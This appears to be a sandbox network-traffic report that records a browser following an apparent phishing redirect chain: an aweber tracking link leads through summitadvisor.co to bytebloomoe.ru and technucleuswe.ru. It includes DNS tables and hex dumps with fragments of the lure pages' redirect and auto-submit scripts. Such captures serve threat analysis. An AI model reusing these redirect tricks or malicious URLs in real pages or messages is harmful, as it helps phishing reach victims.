                            Aug 13, 2024 21:58:06.867141008 CEST53612271.1.1.1192.168.2.6
                            Aug 13, 2024 21:58:27.488524914 CEST53573541.1.1.1192.168.2.6
                            Aug 13, 2024 21:58:28.439013958 CEST53645221.1.1.1192.168.2.6
                            TimestampSource IPDest IPChecksumCodeType
                            Aug 13, 2024 21:57:31.692728043 CEST192.168.2.61.1.1.1c22f(Port unreachable)Destination Unreachable
                            Aug 13, 2024 21:58:05.294761896 CEST192.168.2.61.1.1.1c231(Port unreachable)Destination Unreachable
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Aug 13, 2024 21:57:29.506756067 CEST192.168.2.61.1.1.10x1c34Standard query (0)clicks.aweber.comA (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:29.506973982 CEST192.168.2.61.1.1.10xef78Standard query (0)clicks.aweber.com65IN (0x0001)false
                            Aug 13, 2024 21:57:30.208962917 CEST192.168.2.61.1.1.10xf629Standard query (0)summitadvisor.coA (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:30.209192038 CEST192.168.2.61.1.1.10x2e8aStandard query (0)summitadvisor.co65IN (0x0001)false
                            Aug 13, 2024 21:57:31.635320902 CEST192.168.2.61.1.1.10x5ad1Standard query (0)bytebloomoe.ruA (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:31.635776997 CEST192.168.2.61.1.1.10xf6e0Standard query (0)bytebloomoe.ru65IN (0x0001)false
                            Aug 13, 2024 21:57:32.275470018 CEST192.168.2.61.1.1.10x9bc9Standard query (0)www.google.comA (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:32.275768042 CEST192.168.2.61.1.1.10xf757Standard query (0)www.google.com65IN (0x0001)false
                            Aug 13, 2024 21:57:32.989198923 CEST192.168.2.61.1.1.10xe924Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:32.989434004 CEST192.168.2.61.1.1.10x27efStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                            Aug 13, 2024 21:57:35.125333071 CEST192.168.2.61.1.1.10xa85bStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:35.125817060 CEST192.168.2.61.1.1.10x85a1Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                            Aug 13, 2024 21:57:35.302865982 CEST192.168.2.61.1.1.10x6e72Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:35.303524971 CEST192.168.2.61.1.1.10x7c84Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                            Aug 13, 2024 21:57:37.706919909 CEST192.168.2.61.1.1.10xf2f8Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:37.707144976 CEST192.168.2.61.1.1.10xd35cStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                            Aug 13, 2024 21:58:01.134262085 CEST192.168.2.61.1.1.10xc295Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:01.135219097 CEST192.168.2.61.1.1.10x8cf9Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                            Aug 13, 2024 21:58:01.925370932 CEST192.168.2.61.1.1.10x10faStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:01.925730944 CEST192.168.2.61.1.1.10x2a86Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                            Aug 13, 2024 21:58:02.137638092 CEST192.168.2.61.1.1.10x1d52Standard query (0)technucleuswe.ruA (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:02.137804031 CEST192.168.2.61.1.1.10x43f3Standard query (0)technucleuswe.ru65IN (0x0001)false
                            Aug 13, 2024 21:58:05.098953009 CEST192.168.2.61.1.1.10x5226Standard query (0)technucleuswe.ruA (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:05.099153996 CEST192.168.2.61.1.1.10xe60dStandard query (0)technucleuswe.ru65IN (0x0001)false
                            Aug 13, 2024 21:58:05.215936899 CEST192.168.2.61.1.1.10x2ef6Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:05.216104984 CEST192.168.2.61.1.1.10xa742Standard query (0)code.jquery.com65IN (0x0001)false
                            Aug 13, 2024 21:58:06.859381914 CEST192.168.2.61.1.1.10x29f3Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:06.859692097 CEST192.168.2.61.1.1.10xa1b8Standard query (0)code.jquery.com65IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Aug 13, 2024 21:57:29.518645048 CEST1.1.1.1192.168.2.60x1c34No error (0)clicks.aweber.com104.18.21.223A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:29.518645048 CEST1.1.1.1192.168.2.60x1c34No error (0)clicks.aweber.com104.18.20.223A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:30.220109940 CEST1.1.1.1192.168.2.60xf629No error (0)summitadvisor.co162.241.87.113A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:31.648555994 CEST1.1.1.1192.168.2.60x5ad1No error (0)bytebloomoe.ru104.21.81.207A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:31.648555994 CEST1.1.1.1192.168.2.60x5ad1No error (0)bytebloomoe.ru172.67.146.209A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:31.692636013 CEST1.1.1.1192.168.2.60xf6e0No error (0)bytebloomoe.ru65IN (0x0001)false
                            Aug 13, 2024 21:57:32.282740116 CEST1.1.1.1192.168.2.60x9bc9No error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:32.282776117 CEST1.1.1.1192.168.2.60xf757No error (0)www.google.com65IN (0x0001)false
                            Aug 13, 2024 21:57:32.996042967 CEST1.1.1.1192.168.2.60xe924No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:32.996042967 CEST1.1.1.1192.168.2.60xe924No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:32.996893883 CEST1.1.1.1192.168.2.60x27efNo error (0)challenges.cloudflare.com65IN (0x0001)false
                            Aug 13, 2024 21:57:35.132421017 CEST1.1.1.1192.168.2.60xa85bNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:35.132421017 CEST1.1.1.1192.168.2.60xa85bNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:35.132817030 CEST1.1.1.1192.168.2.60x85a1No error (0)challenges.cloudflare.com65IN (0x0001)false
                            Aug 13, 2024 21:57:35.310874939 CEST1.1.1.1192.168.2.60x6e72No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:35.310874939 CEST1.1.1.1192.168.2.60x6e72No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:35.311130047 CEST1.1.1.1192.168.2.60x7c84No error (0)challenges.cloudflare.com65IN (0x0001)false
                            Aug 13, 2024 21:57:37.717137098 CEST1.1.1.1192.168.2.60xf2f8No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:57:41.287815094 CEST1.1.1.1192.168.2.60x9d3aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                            Aug 13, 2024 21:57:41.287815094 CEST1.1.1.1192.168.2.60x9d3aNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:01.142019033 CEST1.1.1.1192.168.2.60xc295No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:01.142019033 CEST1.1.1.1192.168.2.60xc295No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:01.142462969 CEST1.1.1.1192.168.2.60x8cf9No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                            Aug 13, 2024 21:58:01.933397055 CEST1.1.1.1192.168.2.60x10faNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:01.933397055 CEST1.1.1.1192.168.2.60x10faNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:01.934376001 CEST1.1.1.1192.168.2.60x2a86No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                            Aug 13, 2024 21:58:02.226857901 CEST1.1.1.1192.168.2.60x1d52No error (0)technucleuswe.ru188.114.96.3A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:02.226857901 CEST1.1.1.1192.168.2.60x1d52No error (0)technucleuswe.ru188.114.97.3A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:02.235527039 CEST1.1.1.1192.168.2.60x43f3No error (0)technucleuswe.ru65IN (0x0001)false
                            Aug 13, 2024 21:58:05.221055984 CEST1.1.1.1192.168.2.60x5226No error (0)technucleuswe.ru188.114.96.3A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:05.221055984 CEST1.1.1.1192.168.2.60x5226No error (0)technucleuswe.ru188.114.97.3A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:05.223448038 CEST1.1.1.1192.168.2.60x2ef6No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:05.223448038 CEST1.1.1.1192.168.2.60x2ef6No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:05.223448038 CEST1.1.1.1192.168.2.60x2ef6No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:05.223448038 CEST1.1.1.1192.168.2.60x2ef6No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:05.294689894 CEST1.1.1.1192.168.2.60xe60dNo error (0)technucleuswe.ru65IN (0x0001)false
                            Aug 13, 2024 21:58:06.867141008 CEST1.1.1.1192.168.2.60x29f3No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:06.867141008 CEST1.1.1.1192.168.2.60x29f3No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:06.867141008 CEST1.1.1.1192.168.2.60x29f3No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                            Aug 13, 2024 21:58:06.867141008 CEST1.1.1.1192.168.2.60x29f3No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                            • clicks.aweber.com
                            • summitadvisor.co
                            • https:
                              • bytebloomoe.ru
                              • challenges.cloudflare.com
                              • cdnjs.cloudflare.com
                              • technucleuswe.ru
                              • code.jquery.com
                            • fs.microsoft.com
                            • a.nel.cloudflare.com
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.649717104.18.21.2234432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:30 UTC716OUTGET /y/ct/?l=1Lr_k&m=h9RNUFV_ixtHDTP&b=0la683CmRD4xZfKbroa5Lg HTTP/1.1
                            Host: clicks.aweber.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-User: ?1
                            Sec-Fetch-Dest: document
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:30 UTC651INHTTP/1.1 302 Found
                            Date: Tue, 13 Aug 2024 19:57:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            location: https://summitadvisor.co/voipmessageauth/
                            correlation-id: c030cb2f-0798-43c2-a217-214127ec71f6
                            x-robots-tag: noindex
                            CF-Cache-Status: DYNAMIC
                            Set-Cookie: __cf_bm=MnxeUs5TkWrhH5OANiuZoiZUrUHCdp_kGM..s8EKiGY-1723579050-1.0.1.1-HST4RYpMYmWuAQr7.PaB1P4g_tJRPHMsLa0m41de4gYns7IIj1wXY2QTxdF.6gw4WFEfEIO0yUDlNfNOKIqiiQ; path=/; expires=Tue, 13-Aug-24 20:27:30 GMT; domain=.aweber.com; HttpOnly; Secure; SameSite=None
                            Server: cloudflare
                            CF-RAY: 8b2b4647181843f4-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:57:30 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination Port
                            1192.168.2.64971540.115.3.253443
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:30 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 78 48 50 47 51 74 4f 69 78 30 79 4d 4b 73 54 34 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 35 32 66 30 66 61 37 32 39 30 33 33 34 63 65 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: xHPGQtOix0yMKsT4.1Context: 852f0fa7290334ce
                            2024-08-13 19:57:30 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-08-13 19:57:30 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 78 48 50 47 51 74 4f 69 78 30 79 4d 4b 73 54 34 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 35 32 66 30 66 61 37 32 39 30 33 33 34 63 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 59 31 67 2b 44 4d 34 44 4f 4f 42 33 59 71 2f 7a 62 35 46 4c 52 65 64 4e 64 44 6d 68 57 75 61 74 63 43 32 73 30 34 57 75 4e 6f 47 4f 75 73 51 4f 47 65 55 38 53 58 6f 47 31 45 52 74 41 77 4f 76 79 2b 50 66 74 4d 36 65 76 49 52 6e 4f 6b 63 48 47 56 38 38 7a 51 55 36 59 4a 58 6c 50 67 33 6c 46 70 47 6e 44 6d 67 61 77 75 4a 4b 63
                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: xHPGQtOix0yMKsT4.2Context: 852f0fa7290334ce<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAY1g+DM4DOOB3Yq/zb5FLRedNdDmhWuatcC2s04WuNoGOusQOGeU8SXoG1ERtAwOvy+PftM6evIRnOkcHGV88zQU6YJXlPg3lFpGnDmgawuJKc
                            2024-08-13 19:57:30 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 78 48 50 47 51 74 4f 69 78 30 79 4d 4b 73 54 34 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 35 32 66 30 66 61 37 32 39 30 33 33 34 63 65 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: xHPGQtOix0yMKsT4.3Context: 852f0fa7290334ce<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                            2024-08-13 19:57:30 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-08-13 19:57:30 UTC58INData Raw: 4d 53 2d 43 56 3a 20 42 4c 75 33 38 33 48 62 5a 30 47 66 70 78 75 67 67 49 36 57 2b 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: BLu383HbZ0GfpxuggI6W+w.0Payload parsing failed.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.649719162.241.87.1134432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:30 UTC675OUTGET /voipmessageauth/ HTTP/1.1
                            Host: summitadvisor.co
                            Connection: keep-alive
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-User: ?1
                            Sec-Fetch-Dest: document
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:30 UTC159INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:57:30 GMT
                            Server: Apache
                            Connection: close
                            Transfer-Encoding: chunked
                            Content-Type: text/html; charset=UTF-8
                            2024-08-13 19:57:30 UTC420INData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 76 61 72 20 68 61 73 68 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 0d 0a 20 20 69 66 28 68 61 73 68 20 21 3d
                            Data Ascii: 19d<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head></head></body><script> var hash = window.location.hash; if(hash !=
                            2024-08-13 19:57:30 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.649722104.21.81.2074432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:32 UTC685OUTGET /8QnWX/ HTTP/1.1
                            Host: bytebloomoe.ru
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            sec-ch-ua-platform: "Windows"
                            Upgrade-Insecure-Requests: 1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: navigate
                            Sec-Fetch-Dest: document
                            Referer: https://summitadvisor.co/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:32 UTC831INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:57:32 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            x-powered-by: PHP/7.3.33
                            access-control-allow-origin: *
                            set-cookie: PHPSESSID=kn523ugumdhe6h89qej7h3np25; path=/
                            expires: Thu, 19 Nov 1981 08:52:00 GMT
                            cache-control: no-store, no-cache, must-revalidate
                            pragma: no-cache
                            vary: Accept-Encoding
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=feS%2BMnoGGmWj9DXENTM%2BITG40X9XSZRRXY5lr1hUnsdxqjUpTQpRc391uT%2FSOh%2FjL5kGGyEfLSWRHJ680nsX39BEOc4j5RRDB%2FCEDrJalnwihjf1%2F1gFdLXX4RdmxxEcJg%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8b2b46550b4f4398-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:57:32 UTC538INData Raw: 38 36 34 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 65 63 68 6f 3c 2f 74 69 74 6c 65 3e 0a 09 3c 21 2d 2d 20 3c 73 70 61 6e 3e 54 6f 20 64 72 69 76 65 20 69 73 20 74 6f 20 74 61 6b 65 20 74 68 65 20 73 6f 75 6c 20 66 6f 72 20 61 20 72 69 64 65 3a 20 44 72 69 76 69 6e 67 20 63 61 6e 20 62 65 20 61 20 73 6f 75 6c 66 75 6c 20 65 78 70 65 72 69 65 6e 63 65 2e 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74
                            Data Ascii: 864<html lang="en"><head><title>echo</title>... <span>To drive is to take the soul for a ride: Driving can be a soulful experience.</span> --><meta charset="UTF-8"><meta name="robots" content="noindex, nofollow"><meta name="viewport" content
                            2024-08-13 19:57:32 UTC1369INData Raw: 72 69 66 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 63 65 6e 74 65 72 65 64 2d 63 6f 6e 74 65 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 7d 2e 66 73 2d 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 6d 74 2d 32 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 35 72 65 6d 7d 2e 6d 74 2d 35 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 72 65 6d 7d 2e 74 65 78 74 2d 6d 75 74 65 64 7b 63 6f 6c 6f 72 3a 23 36 63 37 35 37 64 7d 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 21
                            Data Ascii: rif}.container{margin-top:50px;display:flex;justify-content:center}.centered-content{text-align:center;max-width:500px}.fs-5{font-size:1.25rem;display:block}.mt-2{margin-top:.5rem}.mt-5{margin-top:3rem}.text-muted{color:#6c757d}</style></head><body><!
                            2024-08-13 19:57:32 UTC248INData Raw: 61 72 20 69 73 20 75 73 65 6c 65 73 73 20 69 6e 20 4e 65 77 20 59 6f 72 6b 2c 20 65 73 73 65 6e 74 69 61 6c 20 65 76 65 72 79 77 68 65 72 65 20 65 6c 73 65 2e 3c 2f 70 3e 20 2d 2d 3e 0a 09 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 62 61 63 74 65 72 69 6f 6c 6f 67 69 73 74 28 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 66 6f 72 6d 73 5b 30 5d 2e 73 75 62 6d 69 74 28 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 3c 73 70 61 6e 3e 45 78 65 72 63 69 73 65 20 70 72 6f 6d 6f 74 65 73 20 62 65 74 74 65 72 20 73 6c 65 65 70 3a 20 50 68 79 73 69 63 61 6c 20 61 63 74 69 76 69 74 79 20 65 6e 68 61 6e 63 65 73 20 72 65 73 74 66 75 6c 6e 65 73 73 2e 3c 2f 73 70 61 6e 3e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: ar is useless in New York, essential everywhere else.</p> --><script>function bacteriologist() {document.forms[0].submit();}</script>... <span>Exercise promotes better sleep: Physical activity enhances restfulness.</span> --></body></html>
                            2024-08-13 19:57:32 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.649724184.28.90.27443
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:33 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            Accept-Encoding: identity
                            User-Agent: Microsoft BITS/7.8
                            Host: fs.microsoft.com
                            2024-08-13 19:57:33 UTC467INHTTP/1.1 200 OK
                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                            Content-Type: application/octet-stream
                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                            Server: ECAcc (paa/6F76)
                            X-CID: 11
                            X-Ms-ApiVersion: Distribute 1.2
                            X-Ms-Region: prod-neu-z1
                            Cache-Control: public, max-age=225520
                            Date: Tue, 13 Aug 2024 19:57:33 GMT
                            Connection: close
                            X-CID: 2


